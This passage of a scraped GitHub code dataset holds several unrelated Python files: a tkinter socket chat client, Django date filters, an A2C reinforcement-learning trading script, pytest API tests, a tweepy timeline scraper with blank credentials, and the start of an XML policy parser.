recipe_instruction_groups}\n","repo_name":"learning-curv/recipe-scraper","sub_path":"the_chunky_chef_scraper.py","file_name":"the_chunky_chef_scraper.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27043090554","text":"# import all the required modules\nimport socket\nimport threading\nimport json\nfrom datetime import datetime\nfrom tkinter import *\nfrom tkinter import font\nfrom tkinter import ttk\nfrom tkinter import messagebox\n\nSERVER = 'localhost'\nPORT = 8000\nFORMAT = \"utf-8\"\nADDRESS = (SERVER, PORT)\n\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.connect(ADDRESS)\n\n\nclass GUI:\n # constructor method\n def __init__(self):\n # Program Variables\n self.isStart = 
True\n self.client_list = []\n self.client_chats = {}\n self.create_group_list = []\n self.join_group_list = []\n self.join_group_chats = {}\n self.username = \"None\"\n self.current_client_chat = \"None\"\n self.current_group_chat = \"None\"\n self.current_window = \"login\"\n self.is_group = False\n\n # Make root Window\n self.root = Tk()\n\n # Create Login Window\n self.create_root_window()\n self.create_home_window()\n self.create_login_window()\n # self.login.withdraw()\n self.home.withdraw()\n self.root.withdraw()\n\n # start receive thread message\n self.receive_thread = threading.Thread(target=self.receive)\n self.receive_thread.start()\n\n # bind a key to call the same\n self.root.mainloop()\n\n # Init Window\n def create_login_window(self):\n # login window\n self.login = Toplevel()\n self.login.title(\"CHAT APP\")\n self.login.resizable(width=False, height=False)\n self.login.geometry(\"400x300\")\n # create a Label\n self.lbl_login = Label(self.login,\n text=\"Please login to continue\",\n justify=CENTER,\n font=\"Helvetica 14 bold\")\n self.lbl_login.place(relheight=0.15, relx=0.2, rely=0.07)\n\n # create a Label\n self.lbl_login_name = Label(self.login,\n text=\"Name: \",\n font=\"Helvetica 12\")\n self.lbl_login_name.place(relheight=0.2,\n relx=0.1,\n rely=0.2)\n\n # create a entry box for typing the message\n self.ent_login_username = Entry(self.login, font=\"Helvetica 14\")\n self.ent_login_username.place(relwidth=0.4,\n relheight=0.12,\n relx=0.35,\n rely=0.2)\n\n # set the focus to entry login\n self.ent_login_username.focus()\n\n # for error message\n self.lbl_login_error = Label(self.login,\n text=\"\",\n justify=CENTER,\n fg=\"red\",\n font=\"Helvetica 8 bold\")\n # create a Continue Button\n self.btn_login_summit_username = Button(self.login,\n text=\"CONTINUE\",\n font=\"Helvetica 14 bold\",\n command=lambda: self.on_click(\"startup\", type=\"username\", data=self.ent_login_username.get()))\n self.btn_login_summit_username.place(relx=0.4,\n rely=0.55)\n\n self.login.protocol(\"WM_DELETE_WINDOW\", self.on_window_close)\n\n def create_home_window(self):\n # to show chat window\n self.home = Toplevel()\n self.home.title(\"CHAT APP\")\n self.home.resizable(width=False,\n height=False)\n self.home.geometry(\"400x300\")\n\n # create a Label\n self.lbl_home_head = Label(self.home,\n text=\"Username : \"+self.username,\n font=\"Helvetica 13 bold\",\n pady=3)\n self.lbl_home_head.place(relwidth=1)\n\n # create a Label\n self.lbl_home = Label(self.home,\n text=\"Select Chatroom\",\n justify=CENTER,\n font=\"Helvetica 14 bold\")\n self.lbl_home.place(relheight=0.15, relx=0.3, rely=0.07)\n\n # create a Label\n self.lbl_home_clients = Label(self.home,\n text=\"Clients : \",\n font=\"Helvetica 12\")\n self.lbl_home_clients.place(relheight=0.2,\n relx=0.2,\n rely=0.2)\n\n # create client option frame\n self.frame_home_clients = Frame(\n self.home, width=100, height=100)\n self.frame_home_clients.place(relwidth=0.5, rely=0.2, relx=0.35)\n self.lbl_home_client_chat = Label(self.frame_home_clients,\n text=\"Select Client Room\",\n font=\"Helvetica 10\",\n pady=3)\n self.lbl_home_client_chat.pack()\n self.txt_client_var = StringVar(self.home)\n self.combobox_home_client = ttk.Combobox(self.frame_home_clients,\n values=self.client_list, textvariable=self.txt_client_var, state='readonly', postcommand=lambda: self.change_is_group(False))\n self.combobox_home_client.pack(pady=5)\n\n # create a group Label\n self.lbl_home_groups = Label(self.home,\n text=\"Groups : \",\n font=\"Helvetica 
12\")\n self.lbl_home_groups.place(relheight=0.2,\n relx=0.2,\n rely=0.4)\n\n # create client option frame\n self.frame_home_groups = Frame(\n self.home, width=100, height=100)\n self.frame_home_groups.place(relwidth=0.5, rely=0.4, relx=0.35)\n self.lbl_home_group_chat = Label(self.frame_home_groups,\n text=\"Select Group Room\",\n font=\"Helvetica 10\",\n pady=3)\n self.lbl_home_group_chat.pack()\n self.txt_group_var = StringVar(self.home)\n self.combobox_home_group = ttk.Combobox(self.frame_home_groups,\n values=self.create_group_list, textvariable=self.txt_group_var, postcommand=lambda: self.change_is_group(True))\n self.combobox_home_group.pack(pady=5)\n\n # create a Continue Button\n self.btn_home_summit_enter = Button(self.home,\n text=\"ENTER\",\n font=\"Helvetica 14 bold\",\n command=lambda: self.on_click(\"startup\", type=\"openchat\"))\n self.btn_home_summit_enter.place(relx=0.4,\n rely=0.8)\n\n self.home.protocol(\"WM_DELETE_WINDOW\", self.on_window_close)\n\n def create_root_window(self):\n\n # to show chat window\n self.root.title(\"CHAT APP\")\n self.root.resizable(width=False,\n height=False)\n self.root.geometry(\"470x650\")\n self.root.configure(bg=\"#17202A\")\n\n # create a Label\n self.lbl_root_head = Label(self.root,\n bg=\"#292F3F\",\n fg=\"#FFFFFF\",\n text=\"Username : \"+self.username,\n font=\"Helvetica 14 bold\",\n pady=3,\n height=2)\n self.lbl_root_head.place(relwidth=1)\n\n self.lbl_root_sub_head = Label(self.root,\n bg=\"#292F3F\",\n fg=\"#FFFFFF\",\n text=\"Chat room with \"+self.current_client_chat,\n font=\"Helvetica 12 bold\",\n pady=3)\n self.lbl_root_sub_head.place(relwidth=1, rely=0.08)\n\n # Create button\n self.btn_root_back = Button(self.root,\n text=\"Back\",\n font=\"Helvetica 13\",\n command=lambda: self.on_click(\"startup\", type=\"backtohome\"))\n self.btn_root_back.place(relwidth=0.2, rely=0.02, relx=0.02)\n # create a text box\n self.txt_root_message = Text(self.root,\n height=2,\n width=20,\n bg=\"#373E4E\",\n fg=\"#FFFFFF\",\n font=\"Helvetica 13\",\n padx=15,\n pady=15,\n cursor=\"arrow\",\n state=DISABLED)\n self.txt_root_message.place(relheight=0.7,\n relwidth=0.9,\n relx=0.05,\n rely=0.126)\n\n # create a scroll bar\n scrollbar = Scrollbar(self.txt_root_message,\n command=self.txt_root_message.yview)\n scrollbar.place(relheight=0.974,\n relx=1.5)\n\n # create a Label\n self.lbl_root_bottom = Label(self.root,\n bg=\"#ABB2B9\",\n height=80\n )\n self.lbl_root_bottom.place(relwidth=1, rely=0.85)\n\n # create a entry box for typing the message\n self.ent_root_message = Entry(self.lbl_root_bottom,\n bg=\"#2C3E50\",\n fg=\"#EAECEE\",\n font=\"Helvetica 13\")\n self.ent_root_message.place(relwidth=0.74,\n relheight=0.06,\n rely=0.008,\n relx=0.011)\n self.ent_root_message.focus()\n\n # create a Send Button\n self.btn_root_message = Button(self.lbl_root_bottom,\n text=\"Send\",\n font=\"Helvetica 10 bold\",\n width=20,\n bg=\"#ABB2B9\",\n command=lambda: self.on_click(\"sending\", type=\"direct_message\", data=self.ent_root_message.get()))\n self.btn_root_message.place(relx=0.77,\n rely=0.008,\n relheight=0.06,\n relwidth=0.22)\n\n # function to start the thread for sending messages\n self.txt_root_message.config(state=DISABLED)\n\n self.root.protocol(\"WM_DELETE_WINDOW\", self.on_window_close)\n\n # Handle On Window Close\n def on_window_close(self):\n if messagebox.askokcancel(\"Quit\", \"Do you want to quit?\"):\n self.isStart = False\n self.login.destroy()\n self.home.destroy()\n self.root.destroy()\n client.close()\n\n # Main method\n def 
on_click(self, action, type=None, data=None):\n if action == \"startup\":\n if type == 'username':\n self.handle_send_update_username(data)\n elif type == 'openchat':\n if self.is_group:\n self.current_group_chat = self.combobox_home_group.get()\n else:\n self.current_client_chat = self.combobox_home_client.get()\n self.handle_open_chat(self.is_group)\n elif type == 'backtohome':\n self.handle_back_to_home(self.is_group)\n elif action == \"sending\":\n self.handle_send_message(data, self.is_group)\n\n # handle send message to server\n def handle_send_update_username(self, username):\n self.username = username\n message = json.dumps({\n \"type\": \"username\",\n \"data\": username\n })\n client.send(message.encode())\n # Fill here\n self.lbl_root_head.config(text=\"Username : \"+username)\n self.lbl_home_head.config(text=\"Username : \"+username)\n self.username = username\n\n def handle_open_chat(self, is_group):\n # re-window the chat window\n self.home.withdraw()\n self.root.deiconify()\n\n # Attempt swap message\n if is_group:\n # Check that if group is existed\n if self.combobox_home_group.get() not in self.create_group_list:\n self.handle_send_create_group(self.combobox_home_group.get())\n # Check that if group is joined\n if self.combobox_home_group.get() not in self.join_group_list:\n self.handle_send_join_group(self.combobox_home_group.get())\n self.swap_stored_chat(self.current_group_chat,\n self.combobox_home_group.get(), True)\n else:\n self.swap_stored_chat(self.current_client_chat,\n self.combobox_home_client.get(), False)\n\n def handle_back_to_home(self, is_group):\n self.root.withdraw()\n self.txt_root_message.delete(END)\n if is_group:\n self.join_group_chats[self.current_group_chat] = self.txt_root_message.get(\n \"1.0\", 'end-1c')\n self.current_group_chat = None\n else:\n self.client_chats[self.current_client_chat] = self.txt_root_message.get(\n \"1.0\", 'end-1c')\n self.current_client_chat = None\n self.home.deiconify()\n\n def handle_send_message(self, message, is_group):\n if (is_group):\n self.handle_send_group_message(\n self.current_group_chat, message)\n else:\n self.handle_send_direct_message(self.current_client_chat, message)\n\n def handle_send_direct_message(self, recipient, message):\n self.ent_root_message.delete(0, END)\n send_message = json.dumps({\n \"type\": \"direct_message\",\n \"recipient\": recipient,\n \"data\": message\n })\n client.send(send_message.encode())\n self.insert_message(self.username, message, True)\n\n def handle_send_create_group(self, group_name):\n message = json.dumps({\n \"type\": \"create\",\n \"data\": group_name\n })\n client.send(message.encode())\n\n def handle_send_join_group(self, group_name):\n self.join_group_chats[self.current_group_chat] = f\"Welcome to {group_name}\"+\"\\n\\n\"\n message = json.dumps({\n \"type\": \"join\",\n \"data\": group_name\n })\n client.send(message.encode())\n\n def handle_send_group_message(self, group_name, message):\n send_message = json.dumps({\n \"type\": \"group_message\",\n \"group\": group_name,\n \"data\": message\n })\n client.send(send_message.encode())\n self.insert_message(self.username, message, True)\n\n def on_receive(self, response_object):\n print(f'Object from server: {response_object}')\n respond_type = response_object[\"type\"]\n if (respond_type == \"users\" or respond_type == \"username\"):\n self.handle_receive_update_username(response_object)\n elif respond_type == \"direct_message\":\n self.handle_receive_direct_message(response_object)\n elif respond_type == 
\"group_message\":\n self.handle_receive_group_message(response_object)\n elif respond_type == \"groups\":\n self.handle_receive_groups(response_object)\n\n # handle receive message from server\n def handle_receive_update_username(self, response_object):\n if (response_object[\"type\"] == \"username\" and self.current_window == \"login\"):\n self.lbl_login_error.config(text=\"Error: Name already exist!\")\n self.lbl_login_error.place(\n relx=0.35,\n rely=0.33)\n return\n # Set new client_list and create_group_list\n self.client_list = response_object[\"data\"]\n self.create_group_list = response_object[\"group_data\"]\n print(\"client_list : \", self.client_list)\n print(\"created_group : \", self.create_group_list)\n # Set Variable\n self.combobox_home_client.config(values=self.client_list)\n self.combobox_home_group.config(values=self.create_group_list)\n\n # Crate new chat for unexist chat\n for user in response_object[\"data\"]:\n if (user not in self.client_chats):\n self.client_chats[user] = \"\"\n # Hide Login Window\n if (self.current_window == \"login\"):\n self.login.withdraw()\n self.home.deiconify()\n\n def handle_receive_direct_message(self, response_object):\n self.insert_message(\n response_object[\"sender\"], response_object[\"data\"])\n\n def handle_receive_group_message(self, response_object):\n print(\"Received group message\", response_object)\n self.insert_message(\n response_object[\"sender\"], response_object[\"data\"], group_name=response_object[\"group\"], is_group=True)\n\n def handle_receive_groups(self, response_object):\n if response_object[\"isExist\"] and not response_object[\"isJoin\"]:\n self.create_group_list = response_object[\"data\"]\n print(\"created_group : \", self.create_group_list)\n self.combobox_home_group.config(values=self.create_group_list)\n\n # Crate new chat for unexist chat\n for group in response_object[\"data\"]:\n if (group not in self.join_group_chats):\n self.join_group_chats[group] = \"\"\n elif response_object[\"isExist\"] and response_object[\"isJoin\"]:\n self.join_group_list = response_object[\"data\"]\n\n # Add message to text box\n\n def insert_message(self, sender, message, me=False, group_name=\"None\", is_group=False):\n now = datetime.now().strftime(\"%H:%M:%S\")\n # Create Message depends on is that myself\n if (me):\n message = now+\" \"+sender+\"(me) : \"+message+\"\\n\\n\"\n else:\n message = now+\" \"+sender+\" : \"+message+\"\\n\\n\"\n\n if is_group:\n if (group_name == self.current_group_chat) or me:\n self.txt_root_message.config(state=NORMAL)\n self.txt_root_message.insert(END, message)\n self.txt_root_message.config(state=DISABLED)\n self.txt_root_message.see(END)\n return\n self.join_group_chats[group_name] = self.join_group_chats[group_name] + message\n return\n # Insert Message to current text box\n if (sender == self.current_client_chat) or me:\n self.txt_root_message.config(state=NORMAL)\n self.txt_root_message.insert(END, message)\n self.txt_root_message.config(state=DISABLED)\n self.txt_root_message.see(END)\n return\n # Insert Message to stored chat\n self.client_chats[sender] = self.client_chats[sender] + message\n\n # Change Text Box\n def swap_stored_chat(self, old_recipient, new_recipient, is_group=False):\n # Insert new chat\n self.txt_root_message.config(state=NORMAL)\n self.txt_root_message.delete(\"1.0\", END)\n if is_group:\n self.txt_root_message.insert(\n END, self.join_group_chats[new_recipient])\n else:\n self.txt_root_message.insert(\n END, self.client_chats[new_recipient])\n 
self.txt_root_message.config(state=DISABLED)\n self.txt_root_message.see(END)\n # Set current chat and sub text\n if is_group:\n self.current_group_chat = new_recipient\n self.lbl_root_sub_head.config(\n text=\"G.\"+self.current_group_chat+\" Chat room\")\n else:\n self.current_client_chat = new_recipient\n self.lbl_root_sub_head.config(\n text=\"Chat room with \"+new_recipient)\n\n def change_is_group(self, is_group):\n self.is_group = is_group\n\n # thread function\n def receive(self):\n while self.isStart:\n try:\n responseJSON = client.recv(1024).decode()\n self.on_receive(json.loads(responseJSON))\n\n except Exception as e:\n # an error will be printed on the command line or console if there's an error\n print(\"Error has occured\", e)\n break\n\n # End Class\n\n\n# create a GUI class object\napp = GUI()\n","repo_name":"S1xZ/SocketChatApplication","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":20843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3453947937","text":"\n\nfrom django import template\nfrom datetime import date, timedelta\n\nregister = template.Library()\n\n@register.filter(name='get_due_date_string')\ndef get_due_date_string(value):\n # print(f\"get_due_date_string{value}\")\n month={1:\"Jan\",2:\"Feb\",3:\"Mar\",4:\"Apr\",5:\"May\",6:\"June\",7:\"Jul\",8: \"Aug\",9:\"Sept\",10:\"Oct\", 11:\"Nov\",12:\"Dec\"}\n delta = date.today() - value \n \n\n if delta.days == 0:\n return \"Today\"\n \n elif delta.days == 1:\n return \"1 day ago\"\n elif delta.days > 1 and delta.days < 8:\n return \"%s %s ago\" % (abs(delta.days),\n (\"day\" if abs(delta.days) == 1 else \"days\"))\n else:\n today = date.today()\n \n if value.year == today.year:\n return f\"{month[value.month]} {value.day}\"\n else:\n value\n\n return value\n # elif delta.days > 1:\n # return \"In %s days\" % delta.days\n@register.filter(name='convert_option')\ndef convert_option(value):\n \n TX_PAYMENT,TX_LOAN_PAYMENT,TX_VENTURE,TX_TRANSACTION,TX_DEPOSIT,TX_WITHRAWAL,TX_GROCERY,TX_SERVICES=(0,1,2,3,4,5,6,7)\n cat ={TX_TRANSACTION:\"REGULAR TRANSACTION\",TX_PAYMENT:\"PAYMENT\",TX_VENTURE:\"VENTURE\",TX_DEPOSIT:\"DEPOSIT\",TX_WITHRAWAL:'WITHRAWAL',TX_GROCERY:'GROCERY',TX_SERVICES:'SERVICES',TX_LOAN_PAYMENT:\"LOAN PAYMENT\"}\n \n return cat.get(value)","repo_name":"dandybermillo/tryjango","sub_path":"fx/templatetags/app_filters.py","file_name":"app_filters.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6611074505","text":"\nimport pandas as pd\nimport numpy as np\nimport time,datetime\nimport datetime\nimport os\n\n\n# RL models from stable-baselines\nimport gym\nfrom stable_baselines import A2C\nfrom stable_baselines.common.policies import MlpPolicy\nfrom stable_baselines.common.noise import NormalActionNoise, OrnsteinUhlenbeckActionNoise, AdaptiveParamNoiseSpec\nfrom stable_baselines.common.vec_env import DummyVecEnv\n\n\nfrom env.Train_Env import Train_Env\nfrom env.Val_Env import Val_Env\nfrom env.Trading_Env import Trading_Env\n\n\ndef train_A2C(env_train, model_name, timesteps=25000):\n \"\"\"A2C model\"\"\"\n\n start = time.time()\n model = A2C('MlpPolicy', env_train, verbose=0)\n model.learn(total_timesteps=timesteps)\n end = time.time()\n\n\n now = datetime.datetime.now()\n TRAINED_MODEL_DIR = f\"trained_models/{now}\"\n\n model.save(f\"{TRAINED_MODEL_DIR}/{model_name}\")\n print('Training time 
(A2C): ', (end - start) / 60, ' minutes')\n return model\n\n\n\n\n\ndef RL_Trading_Prediction(df,model,name,last_state,iter_num, unique_trade_date,rebalance_window,turbulence_threshold,initial):\n \n\n \n start=unique_trade_date[iter_num - rebalance_window]\n end=unique_trade_date[iter_num]\n trade_data = df[(df.datadate >= start) & (df.datadate < end)]\n trade_data = trade_data.sort_values(['datadate','tic'],ignore_index=True)\n trade_data.index = trade_data.datadate.factorize()[0]\n \n env_trade = DummyVecEnv([lambda: Trading_Env(trade_data,\n turbulence_threshold=turbulence_threshold,\n initial=initial,\n previous_state=last_state,\n model_name=name,\n iteration=iter_num)])\n obs_trade = env_trade.reset()\n \n\n for i in range(len(trade_data.index.unique())):\n action, _states = model.predict(obs_trade)\n obs_trade, rewards, dones, info = env_trade.step(action)\n if i == (len(trade_data.index.unique()) - 2):\n last_state = env_trade.render()\n\n df_last_state = pd.DataFrame({'last_state': last_state})\n df_last_state.to_csv('results/last_state_{}_{}.csv'.format(name, i), index=False)\n \n return last_state\n\n\ndef RL_Trading_Val(model, test_data, test_env, test_obs) -> None:\n \n for i in range(len(test_data.index.unique())):\n action, _states = model.predict(test_obs)\n test_obs, rewards, dones, info = test_env.step(action)\n\n\ndef get_validation_sharpe(iteration):\n \n \n df_total_value = pd.read_csv('results/portfolio_value_validation_{}.csv'.format(iteration), index_col=0)\n df_total_value.columns = ['account_value_train']\n df_total_value['daily_return'] = df_total_value.pct_change(1)\n sharpe = (4 ** 0.5) * df_total_value['daily_return'].mean() / df_total_value['daily_return'].std()\n return sharpe\n\n\ndef trading_policy(df, unique_trade_date, rebalance_window, validation_window) -> None:\n \n\n last_state = []\n\n \n a2c_sharpe_list = []\n\n model_use = []\n \n # Determine the turbulence_threshold from 2009 - 2020\n\n \n insample_turbulence = df[(df.datadate<20151000) & (df.datadate>=20090000)]\n insample_turbulence = insample_turbulence.drop_duplicates(subset=['datadate'])\n \n insample_turbulence_threshold = np.quantile(insample_turbulence.turbulence.values, .90)\n\n start = time.time()\n for i in range(rebalance_window + validation_window, len(unique_trade_date), rebalance_window):\n print(\"============================================\")\n ## initial state is empty\n if i - rebalance_window - validation_window == 0:\n # inital state\n initial = True\n else:\n # previous state\n initial = False\n\n # Tuning trubulence index based on historical data\n # Turbulence lookback window is one quarter\n \n end_date_index = df.index[df[\"datadate\"] == unique_trade_date[i - rebalance_window - validation_window]].to_list()[-1]\n start_date_index = end_date_index - validation_window*30 + 1\n\n historical_turbulence = df.iloc[start_date_index:(end_date_index + 1), :]\n \n\n historical_turbulence = historical_turbulence.drop_duplicates(subset=['datadate'])\n\n historical_turbulence_mean = np.mean(historical_turbulence.turbulence.values)\n\n if historical_turbulence_mean > insample_turbulence_threshold:\n \n turbulence_threshold = insample_turbulence_threshold\n else:\n \n turbulence_threshold = np.quantile(insample_turbulence.turbulence.values, 1)\n \n print(\"turbulence_threshold: \", turbulence_threshold)\n\n \n # Training Setting \n \n\n train_start = 20090000\n train_end = unique_trade_date[i - rebalance_window - validation_window]\n train = df[(df.datadate >= train_start) & 
(df.datadate < train_end)]\n train = train.sort_values(['datadate','tic'],ignore_index=True)\n train.index = train.datadate.factorize()[0]\n \n env_train = DummyVecEnv([lambda: Train_Env(train)])\n\n # Validation Setting\n\n val_start = unique_trade_date[i - rebalance_window - validation_window]\n val_end = unique_trade_date[i - rebalance_window]\n validation = df[(df.datadate >= val_start) & (df.datadate < val_end)]\n validation = validation.sort_values(['datadate','tic'],ignore_index=True)\n validation.index = validation.datadate.factorize()[0]\n\n \n env_val = DummyVecEnv([lambda: Val_Env(validation,\n turbulence_threshold=turbulence_threshold,\n iteration=i)])\n obs_val = env_val.reset()\n \n \n \n # Training \n print(\"======Model training from: \", 20090000, \"to \",\n unique_trade_date[i - rebalance_window - validation_window])\n \n print(\"======A2C Training========\")\n model_a2c = train_A2C(env_train, model_name=\"A2C_30k_dow_{}\".format(i), timesteps=30000)\n print(\"======A2C Validation from: \", unique_trade_date[i - rebalance_window - validation_window], \"to \",\n unique_trade_date[i - rebalance_window])\n RL_Trading_Val(model=model_a2c, test_data=validation, test_env=env_val, test_obs=obs_val)\n sharpe_a2c = get_validation_sharpe(i)\n print(\"A2C Sharpe Ratio: \", sharpe_a2c)\n\n \n \n a2c_sharpe_list.append(sharpe_a2c)\n model= model_a2c\n \n \n # Trading\n\n print(\"======Trading from: \", unique_trade_date[i - rebalance_window], \"to \", unique_trade_date[i])\n #print(\"Used Model: \", model_ensemble)\n last_state = RL_Trading_Prediction(df=df, model=model, name=\"A2C\",\n last_state=last_state, iter_num=i,\n unique_trade_date=unique_trade_date,\n rebalance_window=rebalance_window,\n turbulence_threshold=turbulence_threshold,\n initial=initial)\n \n \n\n end = time.time()\n print(\"A2C Trading Strategy Time: \", (end - start) / 60, \" minutes\")\n","repo_name":"Pyligent/RL_Algo_Trading","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3925706583","text":"import re\n\n\nRE_PERSON_URL = re.compile(\n r\"^/pessoas/[\\d\\w]{8}-[\\d\\w]{4}-[\\d\\w]{4}-[\\d\\w]{4}-[\\d\\w]{12}\"\n)\n\n\ndef test_create_person(client):\n persons = [\n {\n \"apelido\": \"josé\",\n \"nome\": \"José Roberto\",\n \"nascimento\": \"2000-10-01\",\n \"stack\": [\"C#\", \"Node\", \"Oracle\"],\n },\n {\n \"apelido\": \"ana\",\n \"nome\": \"Ana Barbosa\",\n \"nascimento\": \"1985-09-23\",\n \"stack\": None,\n },\n ]\n for person in persons:\n response = client.post(\"/pessoas\", json=person)\n assert response.status_code == 201\n location = response.headers[\"Location\"]\n assert RE_PERSON_URL.match(location) is not None\n\n\ndef test_create_person_duplicated_person(client):\n # caso \"josé\" já tenha sido criado em outra requisição\n person = {\n \"apelido\": \"josé\",\n \"nome\": \"José Roberto\",\n \"nascimento\": \"2000-10-01\",\n \"stack\": [\"C#\", \"Node\", \"Oracle\"],\n }\n\n response = client.post(\"/pessoas\", json=person)\n assert response.status_code == 201\n location = response.headers[\"Location\"]\n assert RE_PERSON_URL.match(location) is not None\n\n response = client.post(\"/pessoas\", json=person)\n assert response.status_code == 422\n\n\ndef test_create_person_empty_fields(client):\n persons = [\n {\n \"apelido\": \"ana\",\n \"nome\": None, # não pode ser None\n \"nascimento\": \"1985-09-23\",\n \"stack\": None,\n },\n {\n 
\"apelido\": None, # não pode ser None\n \"nome\": \"Ana Barbosa\",\n \"nascimento\": \"1985-01-23\",\n \"stack\": None,\n },\n ]\n for person in persons:\n response = client.post(\"/pessoas\", json=person)\n assert response.status_code == 422\n\n\ndef test_create_person_invalid_payload(client):\n persons = [\n {\n \"apelido\": \"apelido\",\n \"nome\": 1, # nome deve ser string e não número\n \"nascimento\": \"1985-01-01\",\n \"stack\": None,\n },\n {\n \"apelido\": \"apelido\",\n \"nome\": \"nome\",\n \"nascimento\": \"1985-01-01\",\n \"stack\": [1, \"PHP\"], # stack deve ser um array de apenas strings\n },\n ]\n for person in persons:\n response = client.post(\"/pessoas\", json=person)\n assert response.status_code == 400\n","repo_name":"RonaldTheodoro/desafio-rinha-de-backend-2023","sub_path":"tests/test_create_person.py","file_name":"test_create_person.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33145390528","text":"import tweepy\nimport json\nimport pandas as pd\nimport os\nimport datetime\n\nfolder_path = \"./twitterdata/\"\n\nconsumer_key = ''\nconsumer_secret = ''\naccess_token = ''\naccess_token_secret = ''\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\ndef update_timeline(username):\n user = username\n print(user)\n profile_image = ''\n user_timeline = api.user_timeline(id=user)\n tweet_df = pd.DataFrame([], columns=['id', 'isRT', 'time', 'lang', 'text'])\n for index in range(0, len(user_timeline)):\n status = user_timeline[index]\n json_str = json.dumps(status._json)\n tweet = json.loads(json_str)\n isRT = 'RT @' in tweet['text']\n tweet_id = tweet['id']\n tweet_time = tweet['created_at']\n d = datetime.datetime.strptime(tweet_time, '%a %b %d %H:%M:%S %z %Y')\n tweet_time = d.strftime('%d.%m.%Y %H:%M:%S')\n lang = tweet['lang']\n tweet_text = tweet['text']\n tweet_info = [tweet_id, isRT, tweet_time, lang, tweet_text]\n profile_image = tweet['user']['profile_image_url']\n if os.path.isfile(folder_path + user + \"_timeline.csv\"):\n tweet_df = pd.read_csv(folder_path + user + \"_timeline.csv\")\n if tweet_id not in tweet_df['id'].values:\n tweet_df.loc[len(tweet_df)] = tweet_info\n tweet_df.to_csv(folder_path + user + \"_timeline.csv\", index=False)\n else:\n tweet_df.loc[len(tweet_df)] = tweet_info\n tweet_df.to_csv(folder_path + user + \"_timeline.csv\", index=False)\n\n print(len(tweet_df.index) < 2)\n return profile_image\n","repo_name":"halukenes/MovietterAPI","sub_path":"twitterAPI_s.py","file_name":"twitterAPI_s.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24436601496","text":"__author__ = 'jgevirtz'\nimport random\nfrom transactional.structures import Set\nfrom transactional.core import Transaction\nfrom unittest import TestCase\n\nclass TestSetBasic(TestCase):\n def test_uniqueness(self):\n \"\"\"\n Make sure the set itself works\n \"\"\"\n s1 = Set()\n s1.add(1)\n s1.add(1)\n s1.add(2)\n\n s2 = Set()\n s2.add(1)\n s2.add(2)\n assert s1 == s2\n\n def test_init(self):\n s1 = Set([1, 2, 3, 3])\n s2 = Set()\n s2.add(1)\n s2.add(1)\n s2.add(2)\n s2.add(3)\n s2.add(3)\n\n assert s1 == s2\n\n def test_remove(self):\n s1 = Set([0, 1, 2, 3, 4])\n s = {0, 1, 2, 3, 4}\n for i in range(5):\n s1.remove(i)\n s.remove(i)\n assert s1 == Set(s)\n\n def test_iter(self):\n 
s = Set([0, 1, 2, 3, 4, 5])\n assert [i for i in s] == [i for i in range(6)]\n\n def test_diff(self):\n s1 = Set([0, 1, 2, 3, 4])\n s2 = Set([2, 3])\n s3 = Set([0, 1, 4])\n assert (s1 - s2) == s3\n\n def test_intersection(self):\n s1 = Set([0, 1, 2])\n s2 = Set([0, 2, 3, 4])\n s3 = Set([0, 2])\n assert (s1 & s2) == s3\n\n def test_union(self):\n s1 = Set([0, 1, 2])\n s2 = Set([3, 4, 5])\n s3 = Set(i for i in range(6))\n\n assert (s1 | s2) == s3\n\n\nclass TestSetTransactional(TestCase):\n def setUp(self):\n random.seed(1987)\n\n def test(self):\n s = Set()\n with Transaction() as t1:\n for i in range(1000):\n s.add(random.randint(0, 50))\n s_copy1 = Set(s)\n\n with Transaction() as t2:\n for i in range(1000):\n s.add(random.randint(0, 50))\n s_copy2 = Set(s)\n\n t2.undo()\n assert s == s_copy1\n\n t2.do()\n assert s == s_copy2\n\n t2.undo()\n t1.undo()\n\n assert s == Set()\n\n","repo_name":"joshgev/transactional","sub_path":"transactional/test/testSet.py","file_name":"testSet.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"36360787877","text":"__author__ = 'Willem Elbers (MPI-TLA) , \\\n Claudio Cacciari (Cineca) '\nimport json\nimport hashlib\nimport logging\nimport logging.handlers\nfrom lxml import etree\nimport requests\nfrom ReplicationPolicy import *\n\n\n\"\"\"\n PolicyParser Class\n Class which manages the parsing of all the policy elements\n\"\"\"\nclass PolicyParser():\n\n def __init__(self, type='', test=False, loggerParentName=None, debug=False):\n\n if loggerParentName: loggerName = loggerParentName + \".PolicyParser\"\n else: loggerName = \"PolicyParser\"\n self.logger = logging.getLogger(loggerName)\n self.loggerName = loggerName\n\n if debug:\n self.logger.setLevel(logging.DEBUG)\n else:\n self.logger.setLevel(logging.INFO)\n\n self.type = type\n self.test = test\n self.debug = debug\n self.dpmNS = '{http://eudat.eu/2013/policy}'\n self.policy = None\n\n def parseXmlSchemaFromUrl(self, url):\n\n self.logger.debug('Parsing xml schema from url ' + url)\n\n response = urllib2.urlopen(url)\n xmlData = response.read()\n schemaDoc = etree.fromstring(xmlData)\n response.close()\n return schemaDoc\n\n def parseXmlSchema(self, schemaurl, schemapath):\n\n if schemaurl and schemaurl[0]:\n self.logger.debug('xml schema URL: ' + schemaurl[0])\n xmlSchemaDoc = self.parseXmlSchemaFromUrl(schemaurl[0])\n elif schemapath and schemapath[0]:\n self.logger.debug('xml schema path: ' + schemapath[0])\n xmlSchemaDoc = etree.parse(schemapath[0])\n else:\n self.logger.debug('xml schema is None')\n 